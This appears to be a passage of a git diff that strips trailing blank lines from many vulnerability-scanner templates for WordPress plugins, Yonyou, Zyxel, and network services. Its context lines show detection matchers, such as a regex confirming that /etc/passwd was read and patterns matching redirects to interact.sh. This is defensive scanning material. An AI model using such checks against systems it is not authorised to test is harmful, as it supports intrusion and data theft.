--git a/http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml b/http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml index c04aee71da..2069c06e63 100644 --- a/http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml b/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml index f0c1a8753f..494820c591 100644 --- a/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml index b992da43ef..489a8638ad 100644 --- a/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml @@ -47,5 +47,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-adaptive-xss.yaml b/http/vulnerabilities/wordpress/wp-adaptive-xss.yaml index a134e8537c..871a276ca1 100644 --- a/http/vulnerabilities/wordpress/wp-adaptive-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-adaptive-xss.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-all-export-xss.yaml b/http/vulnerabilities/wordpress/wp-all-export-xss.yaml index 9b52ca481f..be9023c90b 100644 --- a/http/vulnerabilities/wordpress/wp-all-export-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-all-export-xss.yaml @@ -49,5 +49,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-ambience-xss.yaml b/http/vulnerabilities/wordpress/wp-ambience-xss.yaml index fbaa2ffaf1..296d7c6a35 100644 --- a/http/vulnerabilities/wordpress/wp-ambience-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-ambience-xss.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml b/http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml index 8fb9468396..688ad66964 100644 --- a/http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml b/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml index 075eeea182..ec954913e6 100644 --- a/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml @@ -49,5 +49,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml index 6eb6b139ba..53d74d09f3 100644 --- a/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-finder-xss.yaml b/http/vulnerabilities/wordpress/wp-finder-xss.yaml index 8eaf93a070..e8d703608e 100644 --- a/http/vulnerabilities/wordpress/wp-finder-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-finder-xss.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-flagem-xss.yaml b/http/vulnerabilities/wordpress/wp-flagem-xss.yaml index 7929fdc663..9a891fcae4 100644 --- a/http/vulnerabilities/wordpress/wp-flagem-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-flagem-xss.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml b/http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml index 2f23baadbb..bec34067cb 100644 --- a/http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml @@ -26,5 +26,3 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header - - diff --git a/http/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml b/http/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml index 791d9e2105..330aec51d6 100644 --- a/http/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml @@ -29,5 +29,3 @@ http: - type: status status: - 301 - - diff --git a/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml b/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml index 37ecc1c771..ef862de1a8 100644 --- a/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml @@ -49,5 +49,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-javospot-lfi.yaml b/http/vulnerabilities/wordpress/wp-javospot-lfi.yaml index e9d95c435b..86148f1ab5 100644 --- a/http/vulnerabilities/wordpress/wp-javospot-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-javospot-lfi.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-knews-xss.yaml b/http/vulnerabilities/wordpress/wp-knews-xss.yaml index ba79220f21..cb03205940 100644 --- a/http/vulnerabilities/wordpress/wp-knews-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-knews-xss.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml b/http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml index 53e89d0b93..6cbde23eab 100644 --- a/http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml b/http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml index 8a110824a6..41d763b574 100644 --- a/http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml +++ b/http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml b/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml index cd7b3505be..65a6bb5ef1 100644 --- a/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml b/http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml index 91878715e4..1b5a607412 100644 --- a/http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml b/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml index 88aa0dea82..b4264981cc 100644 --- a/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml b/http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml index 1a8067f20b..c1c827604a 100644 --- a/http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml @@ -21,5 +21,3 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header - - diff --git a/http/vulnerabilities/wordpress/wp-securimage-xss.yaml b/http/vulnerabilities/wordpress/wp-securimage-xss.yaml index 0912d896d5..c578306a64 100644 --- a/http/vulnerabilities/wordpress/wp-securimage-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-securimage-xss.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-security-open-redirect.yaml b/http/vulnerabilities/wordpress/wp-security-open-redirect.yaml index 3492b5dd0c..e0b994f017 100644 --- a/http/vulnerabilities/wordpress/wp-security-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-security-open-redirect.yaml @@ -29,5 +29,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml b/http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml index b11c8751d0..f2d6c00397 100644 --- a/http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml @@ -21,5 +21,3 @@ http: regex: - "root:.*:0:0:" part: body - - diff --git a/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml b/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml index 6023105c21..063a1ad38a 100644 --- a/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-socialfit-xss.yaml b/http/vulnerabilities/wordpress/wp-socialfit-xss.yaml index ee4639ce1a..b9524452fd 100644 --- a/http/vulnerabilities/wordpress/wp-socialfit-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-socialfit-xss.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml b/http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml index d4e3693096..4c52537f27 100644 --- a/http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml @@ -29,5 +29,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml b/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml index 0ec7577e4c..7c4770847c 100644 --- a/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-tutor-lfi.yaml b/http/vulnerabilities/wordpress/wp-tutor-lfi.yaml index 0449644d65..55b1c200a3 100644 --- a/http/vulnerabilities/wordpress/wp-tutor-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-tutor-lfi.yaml @@ -25,5 +25,3 @@ http: regex: - "root:.*:0:0:" part: body - - diff --git a/http/vulnerabilities/wordpress/wp-vault-lfi.yaml b/http/vulnerabilities/wordpress/wp-vault-lfi.yaml index 343531c18b..351a796f38 100644 --- a/http/vulnerabilities/wordpress/wp-vault-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-vault-lfi.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml b/http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml index a615db3762..75a6be6b79 100644 --- a/http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml +++ b/http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml @@ -41,5 +41,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml b/http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml index 51cc5b33a3..3e65cfc1ae 100644 --- a/http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml +++ b/http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml b/http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml index 192566030d..27b6eb9fbc 100644 --- a/http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml b/http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml index ddce980301..e3e09c2dcf 100644 --- a/http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml +++ b/http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wptouch-open-redirect.yaml b/http/vulnerabilities/wordpress/wptouch-open-redirect.yaml index 2c31238b14..b98e4d5ff1 100644 --- a/http/vulnerabilities/wordpress/wptouch-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wptouch-open-redirect.yaml @@ -26,5 +26,3 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header - - diff --git a/http/vulnerabilities/wordpress/wptouch-xss.yaml b/http/vulnerabilities/wordpress/wptouch-xss.yaml index 8e5219efca..0185598b0f 100644 --- a/http/vulnerabilities/wordpress/wptouch-xss.yaml +++ b/http/vulnerabilities/wordpress/wptouch-xss.yaml @@ -54,5 +54,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml b/http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml index de32db15c0..eccc4fbe4a 100644 --- a/http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml +++ b/http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/yonyou/wooyun-path-traversal.yaml b/http/vulnerabilities/yonyou/wooyun-path-traversal.yaml index d07a7e0b71..eeb895f61d 100644 --- a/http/vulnerabilities/yonyou/wooyun-path-traversal.yaml +++ b/http/vulnerabilities/yonyou/wooyun-path-traversal.yaml @@ -32,5 +32,3 @@ http: - part: body condition: and - - diff --git a/http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml index 7939edfdf8..66feb4827d 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml b/http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml index 17bbdc5a18..d428c0d81f 100644 --- a/http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml +++ b/http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml @@ -42,5 +42,3 @@ http: - type: status status: - 200 - - diff --git a/network/backdoor/backdoored-zte.yaml b/network/backdoor/backdoored-zte.yaml index 99cc4611eb..699a27b60b 100644 --- a/network/backdoor/backdoored-zte.yaml +++ b/network/backdoor/backdoored-zte.yaml @@ -37,5 +37,3 @@ tcp: - type: regex regex: - '[A-Z]{1,}[0-9]{3,4}' - - diff --git a/network/cisco-smi-exposure.yaml b/network/cisco-smi-exposure.yaml index abfc5d7bd9..5ad14a2be3 100644 --- a/network/cisco-smi-exposure.yaml +++ b/network/cisco-smi-exposure.yaml @@ -33,5 +33,3 @@ tcp: encoding: hex words: - "000000040000000000000003000000080000000100000000" - - diff --git a/network/clickhouse-unauth.yaml b/network/clickhouse-unauth.yaml index f03da1cfb6..e607c011d9 100644 --- a/network/clickhouse-unauth.yaml +++ b/network/clickhouse-unauth.yaml @@ -27,5 +27,3 @@ tcp: - "ClickHouse" - "UTC" condition: and - - diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml index 1302541a0f..cba947b6ac 100644 --- a/network/cves/2001/CVE-2001-1473.yaml +++ b/network/cves/2001/CVE-2001-1473.yaml @@ -27,5 +27,3 @@ tcp: - type: word words: - "SSH-1" - - diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml index d1bb03c6ff..c8994b6281 100644 --- a/network/cves/2015/CVE-2015-3306.yaml +++ b/network/cves/2015/CVE-2015-3306.yaml @@ -40,5 +40,3 @@ tcp: part: raw words: - "Copy successful" - - diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml index 7f771c795f..1f4194d9bf 100644 --- a/network/cves/2016/CVE-2016-2004.yaml +++ b/network/cves/2016/CVE-2016-2004.yaml @@ -33,5 +33,3 @@ tcp: encoding: hex words: - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system - - diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml index b0890f161b..b885b6c20f 100644 --- a/network/cves/2017/CVE-2017-3881.yaml +++ b/network/cves/2017/CVE-2017-3881.yaml @@ -37,5 +37,3 @@ tcp: - type: word words: - "Current privilege level is" - - diff --git a/network/cves/2018/CVE-2018-2628.yaml b/network/cves/2018/CVE-2018-2628.yaml index 5856379a16..1ae8ee9f6d 100644 --- a/network/cves/2018/CVE-2018-2628.yaml +++ b/network/cves/2018/CVE-2018-2628.yaml @@ -37,5 +37,3 @@ tcp: - type: regex regex: - "\\$Proxy[0-9]+" - - diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml index 722ec1eb91..5396779511 100644 --- a/network/cves/2018/CVE-2018-2893.yaml +++ b/network/cves/2018/CVE-2018-2893.yaml @@ -43,5 +43,3 @@ tcp: part: raw words: - "StreamMessageImpl cannot be cast to weblogic" - - diff --git a/network/cves/2020/CVE-2020-7247.yaml b/network/cves/2020/CVE-2020-7247.yaml index fc3d8a94ac..17a163ba50 100644 --- a/network/cves/2020/CVE-2020-7247.yaml +++ b/network/cves/2020/CVE-2020-7247.yaml @@ -51,5 +51,3 @@ tcp: part: raw words: - "Message accepted for delivery" - - diff --git a/network/cves/2021/CVE-2021-44521.yaml b/network/cves/2021/CVE-2021-44521.yaml index 2159387311..86c7bc1626 100644 --- a/network/cves/2021/CVE-2021-44521.yaml +++ b/network/cves/2021/CVE-2021-44521.yaml @@ -60,5 +60,3 @@ tcp: part: raw words: - "123123" - - diff --git a/network/cves/2022/CVE-2022-0543.yaml b/network/cves/2022/CVE-2022-0543.yaml index 4bfc351bf6..ad71b70e40 100644 --- a/network/cves/2022/CVE-2022-0543.yaml +++ b/network/cves/2022/CVE-2022-0543.yaml @@ -39,6 +39,3 @@ tcp: - type: regex regex: - "root:.*:0:0:" - - - diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml index 4ef90d78f1..03b7c2bb78 100644 --- a/network/cves/2022/CVE-2022-31793.yaml +++ b/network/cves/2022/CVE-2022-31793.yaml @@ -39,5 +39,3 @@ tcp: encoding: hex words: - "726f6f743a" - - diff --git a/network/detect-addpac-voip-gateway.yaml b/network/detect-addpac-voip-gateway.yaml index 2a3584b186..7a5d2b6568 100644 --- a/network/detect-addpac-voip-gateway.yaml +++ b/network/detect-addpac-voip-gateway.yaml @@ -37,5 +37,3 @@ tcp: - type: regex regex: - 'Kernel Version \d\.\d\d\.\d\d\d' - - diff --git a/network/detect-jabber-xmpp.yaml b/network/detect-jabber-xmpp.yaml index dbe1c9fa80..d5f8b635f0 100644 --- a/network/detect-jabber-xmpp.yaml +++ b/network/detect-jabber-xmpp.yaml @@ -29,5 +29,3 @@ tcp: - "stream:stream xmlns:stream" - "stream:error xmlns:stream" condition: or - - diff --git a/network/detection/dotnet-remoting-service-detect.yaml b/network/detection/dotnet-remoting-service-detect.yaml index ce1cfb9f7e..0e6810cbba 100644 --- a/network/detection/dotnet-remoting-service-detect.yaml +++ b/network/detection/dotnet-remoting-service-detect.yaml @@ -34,5 +34,3 @@ tcp: - type: regex regex: - ".NET CLR ([0-9.]+)" - - diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml index b7d60d97ff..72b2dab40c 100644 --- a/network/detection/esmtp-detect.yaml +++ b/network/detection/esmtp-detect.yaml @@ -33,5 +33,3 @@ tcp: - "ESMTP Postfix" - "220" condition: and - - diff --git a/network/detection/gopher-detect.yaml b/network/detection/gopher-detect.yaml index 11a3d9da08..b83dba2ca3 100644 --- a/network/detection/gopher-detect.yaml +++ b/network/detection/gopher-detect.yaml @@ -25,5 +25,3 @@ tcp: - type: dsl dsl: - "contains(to_lower(raw), 'gopher')" - - diff --git a/network/detection/ibm-d2b-database-server.yaml b/network/detection/ibm-d2b-database-server.yaml index d8b9fb4854..12df41f3a5 100644 --- a/network/detection/ibm-d2b-database-server.yaml +++ b/network/detection/ibm-d2b-database-server.yaml @@ -35,5 +35,3 @@ tcp: - "DB2" - "SQLJS1D" condition: or - - diff --git a/network/detection/imap-detect.yaml b/network/detection/imap-detect.yaml index d154dcff13..d3285206ca 100644 --- a/network/detection/imap-detect.yaml +++ b/network/detection/imap-detect.yaml @@ -31,5 +31,3 @@ tcp: - "OK " - "IMAP4rev1" condition: and - - diff --git a/network/detection/iplanet-imap-detect.yaml b/network/detection/iplanet-imap-detect.yaml index af69d7dd70..22422d362b 100644 --- a/network/detection/iplanet-imap-detect.yaml +++ b/network/detection/iplanet-imap-detect.yaml @@ -32,5 +32,3 @@ tcp: part: body regex: - "iPlanet Messaging Server ([0-9.]+)" - - diff --git a/network/detection/java-rmi-detect.yaml b/network/detection/java-rmi-detect.yaml index 75aa4d4f66..af319b8223 100644 --- a/network/detection/java-rmi-detect.yaml +++ b/network/detection/java-rmi-detect.yaml @@ -27,5 +27,3 @@ tcp: part: raw regex: - "^N\\x00\\x0e(\\d{1,3}\\.){3}\\d{1,3}\\x00\\x00" - - diff --git a/network/detection/mikrotik-routeros-api.yaml b/network/detection/mikrotik-routeros-api.yaml index b59238967b..b415083119 100644 --- a/network/detection/mikrotik-routeros-api.yaml +++ b/network/detection/mikrotik-routeros-api.yaml @@ -30,5 +30,3 @@ tcp: encoding: hex words: - "0621666174616c0d6e6f74206c6f6767656420696e00" - - diff --git a/network/detection/mongodb-detect.yaml b/network/detection/mongodb-detect.yaml index 4c96c88d3e..f3037d42fe 100644 --- a/network/detection/mongodb-detect.yaml +++ b/network/detection/mongodb-detect.yaml @@ -31,5 +31,3 @@ tcp: words: - "logicalSessionTimeout" - "localTime" - - diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index af1e3f5ba2..38d529ed4a 100644 --- a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -30,5 +30,3 @@ tcp: words: - "mysql" case-insensitive: true - - diff --git a/network/detection/openssh-detect.yaml b/network/detection/openssh-detect.yaml index 5d1d7569a1..5d2128bc71 100644 --- a/network/detection/openssh-detect.yaml +++ b/network/detection/openssh-detect.yaml @@ -34,5 +34,3 @@ tcp: - type: regex regex: - '(?i)SSH-(.*)-OpenSSH_[^\r]+' - - diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml index 5402f3b5b3..355fb6dc5a 100644 --- a/network/detection/pgsql-detect.yaml +++ b/network/detection/pgsql-detect.yaml @@ -42,5 +42,3 @@ tcp: - "user \"nuclei\"" # The user nuclei (sent in request) doesn't exist - "database \"nuclei\"" # The db nuclei (sent in request) doesn't exist" condition: or - - diff --git a/network/detection/pop3-detect.yaml b/network/detection/pop3-detect.yaml index 96624c892b..d38ba3ffc8 100644 --- a/network/detection/pop3-detect.yaml +++ b/network/detection/pop3-detect.yaml @@ -32,5 +32,3 @@ tcp: - "+OK Dovecot ready" - "POP3" condition: or - - diff --git a/network/detection/rdp-detect.yaml b/network/detection/rdp-detect.yaml index 87df806b2c..d15273b420 100644 --- a/network/detection/rdp-detect.yaml +++ b/network/detection/rdp-detect.yaml @@ -85,5 +85,3 @@ tcp: name: win2016 words: - "030000130ed00000123400021f080008000000" - - diff --git a/network/detection/redis-detect.yaml b/network/detection/redis-detect.yaml index d2dba409be..0083193077 100644 --- a/network/detection/redis-detect.yaml +++ b/network/detection/redis-detect.yaml @@ -32,5 +32,3 @@ tcp: - "CONFIG REWRITE" - "NOAUTH Authentication" condition: or - - diff --git a/network/detection/rpcbind-portmapper-detect.yaml b/network/detection/rpcbind-portmapper-detect.yaml index 58474b2540..b1a2886f7d 100644 --- a/network/detection/rpcbind-portmapper-detect.yaml +++ b/network/detection/rpcbind-portmapper-detect.yaml @@ -29,5 +29,3 @@ tcp: - type: word words: - "/run/rpcbind.sock" - - diff --git a/network/detection/rsyncd-service-detect.yaml b/network/detection/rsyncd-service-detect.yaml index 43c75bbecd..e1539d3c4b 100644 --- a/network/detection/rsyncd-service-detect.yaml +++ b/network/detection/rsyncd-service-detect.yaml @@ -35,5 +35,3 @@ tcp: - type: regex regex: - 'RSYNCD: \d\d.\d' - - diff --git a/network/detection/rtsp-detect.yaml b/network/detection/rtsp-detect.yaml index e67d772618..b9beed2b9d 100644 --- a/network/detection/rtsp-detect.yaml +++ b/network/detection/rtsp-detect.yaml @@ -32,5 +32,3 @@ tcp: - type: word words: - "RTSP/1.0" - - diff --git a/network/detection/samba-detect.yaml b/network/detection/samba-detect.yaml index c2b2bc9a05..b385e4bcb4 100644 --- a/network/detection/samba-detect.yaml +++ b/network/detection/samba-detect.yaml @@ -26,4 +26,3 @@ tcp: - type: word words: - "SMBr" - diff --git a/network/detection/vnc-service-detect.yaml b/network/detection/vnc-service-detect.yaml index 09202704d9..1e10ab8fc1 100644 --- a/network/detection/vnc-service-detect.yaml +++ b/network/detection/vnc-service-detect.yaml @@ -28,5 +28,3 @@ tcp: part: body regex: - "RFB ([0-9.]+)" - - diff --git a/network/enumeration/mongodb-info-enum.yaml b/network/enumeration/mongodb-info-enum.yaml index ce84902927..f142bf6a5b 100644 --- a/network/enumeration/mongodb-info-enum.yaml +++ b/network/enumeration/mongodb-info-enum.yaml @@ -40,5 +40,3 @@ tcp: - type: regex regex: - "([A-Za-z:0-9.]+)" - - diff --git a/network/exposed-adb.yaml b/network/exposed-adb.yaml index b7750e5bd9..7381ae6700 100644 --- a/network/exposed-adb.yaml +++ b/network/exposed-adb.yaml @@ -31,5 +31,3 @@ tcp: - "device" - "product" condition: and - - diff --git a/network/exposed-redis.yaml b/network/exposed-redis.yaml index 00c551e800..e86157a539 100644 --- a/network/exposed-redis.yaml +++ b/network/exposed-redis.yaml @@ -31,6 +31,3 @@ tcp: negative: true words: - "redis_mode:sentinel" - - - diff --git a/network/exposed-zookeeper.yaml b/network/exposed-zookeeper.yaml index 99f36419b5..ad219d50db 100644 --- a/network/exposed-zookeeper.yaml +++ b/network/exposed-zookeeper.yaml @@ -24,5 +24,3 @@ tcp: - type: word words: - "zookeeper.version" - - diff --git a/network/ftp-weak-credentials.yaml b/network/ftp-weak-credentials.yaml index 955bb109e4..696970bf22 100644 --- a/network/ftp-weak-credentials.yaml +++ b/network/ftp-weak-credentials.yaml @@ -41,5 +41,3 @@ tcp: - type: word words: - "230 Login successful" - - diff --git a/network/mongodb-unauth.yaml b/network/mongodb-unauth.yaml index 0e28447f30..c148d4dcba 100644 --- a/network/mongodb-unauth.yaml +++ b/network/mongodb-unauth.yaml @@ -27,5 +27,3 @@ tcp: - type: word words: - "totalLinesWritten" - - diff --git a/network/mysql-native-password.yaml b/network/mysql-native-password.yaml index 7fd13d47db..c2172a18c9 100644 --- a/network/mysql-native-password.yaml +++ b/network/mysql-native-password.yaml @@ -24,5 +24,3 @@ tcp: - type: word words: - "mysql_native_password" - - diff --git a/network/sap-router-info-leak.yaml b/network/sap-router-info-leak.yaml index 2c68a749d2..b54af01092 100644 --- a/network/sap-router-info-leak.yaml +++ b/network/sap-router-info-leak.yaml @@ -28,5 +28,3 @@ tcp: - "Routtab" - "Working directory" - "SAProuter Connection Table" - - diff --git a/network/tidb-native-password.yaml b/network/tidb-native-password.yaml index 6764a1810e..2509779983 100644 --- a/network/tidb-native-password.yaml +++ b/network/tidb-native-password.yaml @@ -24,5 +24,3 @@ tcp: - "mysql_native_password" - "TiDB" condition: and - - diff --git a/network/tidb-unauth.yaml b/network/tidb-unauth.yaml index 99e8dda44d..2675f7a656 100644 --- a/network/tidb-unauth.yaml +++ b/network/tidb-unauth.yaml @@ -28,5 +28,3 @@ tcp: # resp format: # 07: length, 02: sequence number, 00: success - "0700000200000002000000" - - diff --git a/network/vsftpd-backdoor.yaml b/network/vsftpd-backdoor.yaml index 5dc554b060..e8195a5bff 100644 --- 